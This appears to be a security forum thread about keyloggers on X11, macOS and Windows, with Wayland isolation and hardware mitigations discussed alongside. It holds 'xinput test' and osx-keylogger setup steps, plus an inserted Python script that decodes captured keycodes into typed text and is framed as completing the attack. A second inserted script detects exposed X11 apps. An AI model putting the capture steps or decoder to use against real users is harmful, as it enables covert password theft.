Hello,

I have been looking into keyloggers, and making some scary discoveries.

On Linux

For any X11 app (and that is still most graphical apps) it's really easy. Proof of concept:
In a terminal emulator, type "xinput" and find the id of your keyboard. Then type "xinput test <id>" (replace <id> with the right number; you might have to try several).

Now go to any other app (Firefox, whatever) and type something. Even if you type a password in another terminal window, you will see all your keystrokes appear. Basically any graphical app (X11 client) can listen to all keystrokes. Thankfully X11 is to be replaced by Wayland, which does not have this vulnerability. However, we're not there yet.

On OSX

I found this:
https://www.npmjs.com/package/osx-keylogger

If you have node installed, it's easy to set up. Just install the module, then create a JavaScript script by pasting the short example code. You might have to replace "swedish.json" with the correct path, depending on where the swedish.json file is in relation to your example script. I had to replace it with 'node_modules/osx-keylogger/swedish.json'. Then just run that script, for example "node example.js".

Again, it will catch any keystrokes that I type in another window (such as Firefox).
I tested it on OSX 10.11.6, and it launched without requesting any permissions or any warning.
It would not capture passwords in Firefox, Safari, or OSX password prompts (when requesting administrative access). However, it did capture password fields in HTML forms in Chrome. And of course it captured other information, such as the username and anything else I was typing, which was not protected.

So there is a security feature in OSX to block keyloggers when entering passwords, but Chrome (63.0.3239.132) is not making use of it.

If possible, I would like someone to confirm the OSX test on a newer version of OSX.

On Windows

I haven't done any tests on Windows. Some research left me with the impression that it's more complicated to do this on modern versions of Windows without triggering some sort of warning or confirmation, due to various safeguards that were added.

The implications of such vulnerabilities are worrying. It means that any software we download from the internet could contain malicious code that silently captures sensitive information and sends it to someone.
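Added example, not part of the original post: the xinput PoC above only prints raw keycodes ("key press 38"), and a keylogger still has to turn those into characters. The keycode-to-keysym table is readable by any X11 client with `xmodmap -pke`, so that last step is trivial, as this Python script shows. The `xinput test` and `xmodmap -pke` samples embedded in it are constructed (standard US-layout keycodes); on a real system you would feed it the live output of those two commands.

```python
"""Decode `xinput test` output into the text that was typed.

Added example, not from the thread. `xinput test <id>` prints keycodes only;
the keycode -> keysym table that every X11 client can read via `xmodmap -pke`
turns them back into characters, which is all a keylogger needs.
"""
import re

# Constructed excerpt of `xmodmap -pke` output (US layout). On a real system:
#   subprocess.run(["xmodmap", "-pke"], capture_output=True, text=True).stdout
XMODMAP_PKE = """\
keycode  11 = 2 at 2 at
keycode  20 = minus underscore minus underscore
keycode  31 = i I i I
keycode  36 = Return NoSymbol Return
keycode  43 = h H h H
keycode  50 = Shift_L NoSymbol Shift_L
keycode  53 = x X x X
keycode  62 = Shift_R NoSymbol Shift_R
keycode  65 = space NoSymbol space
"""

# Constructed `xinput test <id>` output captured while "Hi x" + Enter was
# typed into a different window.
XINPUT_TEST = """\
key press   50
key press   43
key release 43
key release 50
key press   31
key release 31
key press   65
key release 65
key press   53
key release 53
key press   36
key release 36
"""

# X keysym names that do not spell their own character
NAMED_KEYSYMS = {
    "space": " ", "Return": "\n", "Tab": "\t", "BackSpace": "\b",
    "minus": "-", "underscore": "_", "period": ".", "comma": ",",
    "at": "@", "slash": "/",
}
SHIFT_KEYSYMS = {"Shift_L", "Shift_R"}
OTHER_MODIFIERS = {"Control_L", "Control_R", "Alt_L", "Alt_R", "Super_L", "Super_R"}


def parse_xmodmap(text):
    """Return {keycode: [keysym, ...]} from `xmodmap -pke` lines."""
    table = {}
    for m in re.finditer(r"^keycode\s+(\d+)\s*=\s*(.*)$", text, re.M):
        syms = m.group(2).split()
        if syms:
            table[int(m.group(1))] = syms
    return table


def parse_xinput_events(text):
    """Yield (is_press, keycode) from `xinput test` output; mouse lines are ignored."""
    for m in re.finditer(r"^key (press|release)\s+(\d+)", text, re.M):
        yield m.group(1) == "press", int(m.group(2))


def keysym_to_char(keysym):
    """Map a keysym name to the character it produces ('' for non-printing keys)."""
    if keysym in NAMED_KEYSYMS:
        return NAMED_KEYSYMS[keysym]
    return keysym if len(keysym) == 1 else ""


def decode_keystrokes(xinput_text, xmodmap_text):
    """Reconstruct typed text from xinput key events plus the keymap."""
    keymap = parse_xmodmap(xmodmap_text)
    shift_down = set()          # keycodes of Shift keys currently held
    out = []
    for is_press, keycode in parse_xinput_events(xinput_text):
        syms = keymap.get(keycode)
        if not syms:
            continue
        if syms[0] in SHIFT_KEYSYMS:
            if is_press:
                shift_down.add(keycode)
            else:
                shift_down.discard(keycode)
            continue
        if not is_press or syms[0] in OTHER_MODIFIERS:
            continue
        # xmodmap column 0 is the unshifted keysym, column 1 the shifted one
        shifted = bool(shift_down) and len(syms) > 1 and syms[1] != "NoSymbol"
        out.append(keysym_to_char(syms[1 if shifted else 0]))
    return "".join(out)


if __name__ == "__main__":
    print(repr(decode_keystrokes(XINPUT_TEST, XMODMAP_PKE)))
```

Pipe `xinput test <id>` into this and you have the whole attack: nothing here needs root or any permission beyond being an X11 client on the same display.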
On Windows you can do compiled AutoHotkey scripts, I think. What are the alternatives to typing your password?
Jerome wrote: On Windows you can do compiled AutoHotkey scripts, I think. What are the alternatives to typing your password?
You can use an on-screen keyboard, and your mouse, to type in the password. On X11 you can forget about that - in addition to reading keyboard input, all X clients can get screen grabs.

I don't think there is an alternative to well-designed, secure software. On Linux I use Wayland instead of X11, which isolates different clients. X11 was created decades ago. Nowadays we have the habit of downloading many small programs from the internet, so there needs to be another security model, and X11 does not seem to have evolved much in that direction.

In my opinion the best security model is Android's. Every app runs in some sort of container (Dalvik VM) and every app is assigned a different user, so there is no mingling, except when apps are given special permissions. The other thing is the permission/capability model, which is the way to go, as opposed to the ACL model of Windows.

Unfortunately I haven't found an equivalent level of security for desktop systems, not with the same level of usability and maturity, and Android-x86 is pretty experimental stuff.

Desktop systems have all more or less progressed from an "open" model where every app can do anything, and have piled up restrictions and protection mechanisms on top of that. Neither optimal nor elegant, but it works somehow.

How would AutoHotkey help? Do you have a particular use case in mind? Do you mean entering the password only once? That sounds more secure, yes.
I have a concept, and partially working hardware (I didn't find a proper display for it, to complete it). An encrypted keypad, which encrypts data directly in the keypad, operating with the keys of authorized websites. A fake website just won't be able to request the password, so the keypad won't turn on for malware or a fake website, and any malicious software won't be able to decipher it either, even if they intercept it.
An alternative is smartcards, for example, but I believe they can be compromised, as the PIN is entered on the PC, and it is usually weak.
I believe other ways are not reliable in any case, especially with recently discovered attacks like Meltdown and Spectre.
So the data will be encrypted all the way from the hardware to the remote servers. I think that's a good concept.
I'm just wondering how this will integrate with existing systems, for example, a web browser, which would expect keystrokes. It might get a little complicated.
8 months later
I use multi-factor authentication when I can, and keys instead of passwords when possible.
rolf wrote: On Linux I use Wayland instead of X11, which isolates different clients.
May I ask which distro? Did it come with wayland by default?
And what about Xwayland? Doesn't wayland still run an X server on top of itself for backwards compatibility? Thus apps that use X will still be vulnerable to this?
nuclearcat wrote: I have a concept, and partially working hardware (I didn't find a proper display for it, to complete it). An encrypted keypad, which encrypts data directly in the keypad, operating with the keys of authorized websites.
That is an amazing idea. I'm aware of keystroke encryption being implemented in software and wireless keyboards, but your idea seems totally new. Though it would make keyboards much more expensive if they have to receive, store and use encryption keys. The general public might not care for such things, but I'm sure many will love it.
nxnjz wrote: I use multi-factor authentication when I can, and keys instead of passwords when possible.
rolf wrote: On Linux I use Wayland instead of X11, which isolates different clients.
May I ask which distro? Did it come with wayland by default?
And what about Xwayland? Doesn't wayland still run an X server on top of itself for backwards compatibility? Thus apps that use X will still be vulnerable to this?
I am a Debian guy. If you install the GNOME desktop then you should have the option of using Wayland.

I found GNOME to be "too heavy", so I tried more minimal options such as Weston. But I gave up on this, too many bugs. I went back to GNOME.

My solution now is to use Windows for a few minutes and then go back to Linux; the GNOME desktop suddenly feels very light.

By the way, I'm not even sure whether I'm running GNOME atop Wayland or X11 now.

I read that Ubuntu reverted to X11.

Yes, Xwayland is a part of Wayland. Only apps that use Xwayland are vulnerable to each other.
Xwayland runs as a Wayland client, so it is isolated from any other Wayland clients.

However, major libraries such as Qt and GTK+ have been made compatible with Wayland. This means that any application built on top of these libraries will run as a Wayland client, so you can find many options.
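Added example, not from the thread, for the question of which apps are still exposed. Under Wayland the X11 apps run through Xwayland and stay mutually visible, and `xlsclients -l` (from x11-utils) asks the X server, which in a Wayland session is Xwayland, for exactly that client list. The Python below classifies the session from its environment variables and parses that list; the `xlsclients -l` output embedded in it is a constructed sample, and the field layout it parses is the one that command prints.

```python
"""Which apps in this session are X11 clients (and so can snoop on each other)?

Added example, not from the thread. Under plain X11 every graphical app is
in this set; under Wayland only the Xwayland clients are. The check therefore
answers both "am I on Wayland?" and "which of my apps still don't benefit?".
"""
import os
import re
import shutil
import subprocess

# Constructed sample of `xlsclients -l` output from a Wayland session in which
# a browser and a terminal still run through Xwayland.
SAMPLE_XLSCLIENTS = """\
Window 0x1c00001:
  Machine:  laptop
  Name:  Mozilla Firefox
  Icon Name:  Mozilla Firefox
  Command:  firefox
  Instance/Class:  Navigator/Firefox
Window 0x2800003:
  Machine:  laptop
  Name:  Terminal
  Icon Name:  Terminal
  Command:  xterm
  Instance/Class:  xterm/XTerm
"""


def session_type(env):
    """Classify a desktop session as 'wayland', 'x11' or 'unknown'.

    XDG_SESSION_TYPE is what logind sets; WAYLAND_DISPLAY / DISPLAY are the
    fallbacks for sessions started without it.
    """
    st = env.get("XDG_SESSION_TYPE", "").lower()
    if st in ("wayland", "x11"):
        return st
    if env.get("WAYLAND_DISPLAY"):
        return "wayland"
    if env.get("DISPLAY"):
        return "x11"
    return "unknown"


def parse_xlsclients(text):
    """Parse `xlsclients -l` output into one dict per X client.

    Keys are the lower-cased field names ('machine', 'name', 'icon name',
    'command', 'instance/class') plus 'window'.
    """
    clients, current = [], None
    for line in text.splitlines():
        m = re.match(r"^Window (0x[0-9a-fA-F]+):", line)
        if m:
            current = {"window": m.group(1)}
            clients.append(current)
            continue
        m = re.match(r"^\s+([A-Za-z /]+):\s*(.*)$", line)
        if m and current is not None:
            current[m.group(1).strip().lower()] = m.group(2).strip()
    return clients


def exposed_x11_apps(env, xlsclients_output):
    """Return (session_type, commands of apps that can read each other's keystrokes).

    Under X11 that is every graphical app; under Wayland only the Xwayland
    clients; with no usable display at all, nothing.
    """
    kind = session_type(env)
    if kind == "unknown" or not xlsclients_output:
        return kind, []
    return kind, [c.get("command", "?") for c in parse_xlsclients(xlsclients_output)]


def live_report():
    """Run the real check on this machine (needs xlsclients and a DISPLAY)."""
    output = ""
    if shutil.which("xlsclients") and os.environ.get("DISPLAY"):
        output = subprocess.run(["xlsclients", "-l"], capture_output=True, text=True).stdout
    return exposed_x11_apps(dict(os.environ), output)


if __name__ == "__main__":
    kind, apps = live_report()
    print(f"session type: {kind}")
    for app in apps:
        print(f"  X11 client, exposed to the other X11 clients: {app}")
```

An empty list in a Wayland session means everything you run is a native Wayland client; any entry is an app that is still in the same boat as under plain X11.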
rolf wrote: I haven't done any tests on Windows. Some research left me with the impression that it's more complicated to do this on modern versions of Windows without triggering some sort of warning or confirmation, due to various safeguards that were added.
On Windows it's also very easy. I once wrote a C++ keylogger that runs in the background. I was surprised that neither Windows Defender nor any antivirus (tested with AVG, Kaspersky, Avast and even Norton Business installed on my university's PCs) detected anything suspicious.